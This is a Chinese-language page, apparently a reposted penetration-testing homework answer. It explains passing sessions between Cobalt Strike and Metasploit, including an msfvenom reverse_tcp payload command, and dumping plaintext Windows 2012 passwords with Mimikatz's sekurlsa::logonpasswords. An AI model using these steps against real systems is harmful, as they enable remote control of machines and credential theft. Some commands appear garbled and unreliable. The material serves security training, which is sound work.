欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 培训 > 第2次作业

第2次作业

2025/5/3 3:33:55 来源:https://blog.csdn.net/Wincreds/article/details/139999456  浏览:    关键词:第2次作业

问题:cs与msf权限传递,以及mimikatz抓取win2012明文密码。

一、CS与MSF权限传递

CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,它们都支持在渗透过程中传递权限。以下是两者之间传递权限的一般步骤:

从Metasploit向Cobalt Strike传递会话
1. 在Metasploit中获取会话:使用Metasploit渗透目标系统并获得会话。
2. 启动Metasploit RPC服务:在Metasploit控制台中启动RPC服务,以便Cobalt Strike可以与Metasploit通信。

   load msgrpc ServerHost=127.0.0.1 Pass=yourpassword


3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC设置,使其能够连接到Metasploit的RPC服务。

 metasploit_rpc_login("127.0.0.1", 55553, "yourpassword")


4. 传递会话:在Cobalt Strike中使用`metasploit_import`命令导入Metasploit会话。

从Cobalt Strike向Metasploit传递会话 


1. 在Cobalt Strike中获取会话:使用Cobalt Strike渗透目标系统并获得会话。
2. 生成Payload:在Metasploit中生成一个Payload,用于接收Cobalt Strike的会话。

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=your_port -f exe > payload.exe


3. 在Cobalt Strike中执行Payload:将生成的Payload上传到目标系统并执行,以便Metasploit接收到会话。
4. 接收会话:在Metasploit中配置并监听相应的端口,以接收传递过来的会话。

二、 使用Mimikatz抓取Windows 2012明文密码

Mimikatz是一款强大的工具,用于从Windows系统中提取明文密码、哈希、PIN码等。以下是使用Mimikatz抓取Windows 2012明文密码的步骤:

1. 下载并解压Mimikatz:从GitHub上下载Mimikatz工具,并解压到本地。
2. 以管理员身份运行命令提示符:打开命令提示符,并以管理员身份运行。
3. 执行Mimikatz:导航到Mimikatz所在目录,并启动Mimikatz。

   cd path\to\mimikatzmimikatz.exe


4.启用调试特权:在Mimikatz控制台中启用调试特权。

   privilege::debug


5. 抓取明文密码:使用以下命令来抓取明文密码。
 

   sekurlsa::logonpasswords

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词